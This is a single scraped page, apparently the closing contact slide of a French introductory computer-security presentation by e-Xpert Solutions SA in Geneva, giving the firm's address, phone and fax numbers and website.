![Page 178: Introduction à La Sécurité Informatique 1/2](https://reader036.fdocument.pub/reader036/viewer/2022062312/555bf9aed8b42a5b448b4dc8/html5/thumbnails/178.jpg)
e-Xpert Solutions SA | 29, route de Pré-Marais | CH 1233 Bernex-Genève | Tél +41 22 727 05 55 | Fax +41 22 727 05 50
[email protected] | www.e-xpertsolutions.com
Pour plus d’informations
e-Xpert Solutions SARoute de Pré-Marais 29
CH-1233 Bernex / Genève
+41 22 727 05 [email protected]